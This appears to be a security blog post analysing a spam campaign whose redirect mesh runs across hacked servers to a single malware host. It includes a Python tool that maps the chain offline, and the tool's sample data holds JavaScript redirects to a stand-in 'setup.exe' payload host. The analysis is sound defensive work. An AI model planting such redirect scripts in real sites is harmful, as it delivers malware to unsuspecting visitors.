Analysis of an Active Malware Campaign

A major malware campaign has been running for several weeks. Beyond the facts themselves, it is the operating mode that draws our attention, because it shows the growing sophistication of spammers. Following the example of fast-flux service networks, the spammers have set up a mechanism that increases the availability of the resources involved in spreading the malware, which ultimately maximises their return on investment.
For this purpose the spammer has a pool of hacked servers and a single server hosting the malware. Classically, the spam contains a link to a document hosted on one of the hacked servers.

That document contains several references to the same redirection script, and each reference points at a copy of the script hosted on a different hacked server. Removing the script from any one of those servers therefore does not break the chain: the document still loads it from the others.

The redirection script loads the malware, which is hosted on a server that probably belongs to the spammer rather than to a compromised third party.

All the other spam messages of this campaign work the same way: each contains a link to a document on one server in the pool of hacked servers, and that document in turn loads the redirection script from multiple other servers in the same pool. The spammer thus has an optimal mesh: to defeat it, either every hacked server must be cleaned or the single site hosting the malware must be shut down.
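To make the chain concrete, the following is an added example (not code from the post or from the campaign) that maps the three tiers the post describes: the document host reached from the spam link, the hacked hosts serving the shared redirection script, and the final malware host. Every hostname, URL and page body below is constructed for the illustration, and the network is replaced by an offline dictionary lookup standing in for an HTTP fetcher.

```python
"""Map a spam campaign's redirect mesh:
spam link -> document on hacked host -> shared redirect script on other
hacked hosts -> single malware host.

Added example. All hosts, paths and page contents are constructed; the
fetcher below is an offline stand-in for HTTP requests.
"""
import re
from html.parser import HTMLParser
from urllib.parse import urljoin, urlparse

# Constructed corpus: URL -> response body (replaces a real HTTP fetcher).
FAKE_WEB = {
    "http://shop-a.example/promo.html": """
        <html><body><p>Your invoice is ready</p>
        <script src="http://blog-b.example/js/go.js"></script>
        <script src="http://forum-c.example/cache/go.js"></script>
        <script src="//cms-d.example/assets/go.js"></script>
        </body></html>""",
    # Three copies of the same redirect script on three hacked hosts.
    "http://blog-b.example/js/go.js":
        'window.location="http://dl-payload.example/setup.exe";',
    "http://forum-c.example/cache/go.js":
        "window.location.href='http://dl-payload.example/setup.exe';",
    "http://cms-d.example/assets/go.js":
        'document.location = "http://dl-payload.example/setup.exe";',
}


def fetch(url):
    """Offline fetcher over the constructed corpus; unknown URLs return ''."""
    return FAKE_WEB.get(url, "")


class ScriptSrcParser(HTMLParser):
    """Collect absolute URLs of every <script src=...> in a document."""

    def __init__(self, base_url):
        super().__init__()
        self.base_url = base_url
        self.srcs = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            src = dict(attrs).get("src")
            if src:
                # urljoin also resolves protocol-relative "//host/path" forms.
                self.srcs.append(urljoin(self.base_url, src))


def script_urls(page_url, html):
    parser = ScriptSrcParser(page_url)
    parser.feed(html)
    return parser.srcs


# Common JavaScript redirect assignments: window/document.location[.href] = "...".
REDIRECT_RE = re.compile(
    r"""(?:window|document)\.location(?:\.href)?\s*=\s*["']([^"']+)["']""")


def redirect_target(js_source):
    """Return the URL a redirect script sends the browser to, or None."""
    match = REDIRECT_RE.search(js_source)
    return match.group(1) if match else None


def map_mesh(spam_links, fetch=fetch):
    """Return the set of hosts in each tier of the chain."""
    doc_hosts, script_hosts, payload_hosts = set(), set(), set()
    for link in spam_links:
        doc_hosts.add(urlparse(link).hostname)
        for script_url in script_urls(link, fetch(link)):
            script_hosts.add(urlparse(script_url).hostname)
            target = redirect_target(fetch(script_url))
            if target:
                payload_hosts.add(urlparse(target).hostname)
    return {"documents": doc_hosts, "scripts": script_hosts,
            "payload": payload_hosts}


def takedown_options(mesh):
    """The two ways to break the chain: clean every hacked host, or
    take down the (much smaller) set of payload hosts."""
    hacked = mesh["documents"] | mesh["scripts"]
    return {"clean_all_hacked": sorted(hacked),
            "shut_down_payload_host": sorted(mesh["payload"])}


if __name__ == "__main__":
    mesh = map_mesh(["http://shop-a.example/promo.html"])
    for tier, hosts in mesh.items():
        print(f"{tier:10s} {sorted(hosts)}")
    print(takedown_options(mesh))
```

Run against the constructed corpus, the script tier has three hosts and the payload tier one, which is exactly the asymmetry the post points out: the redirect layer is replicated like a fast-flux network, while the malware itself sits behind a single host.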
I hope you enjoy this analysis of an active malware campaign.
Filter Lab Manager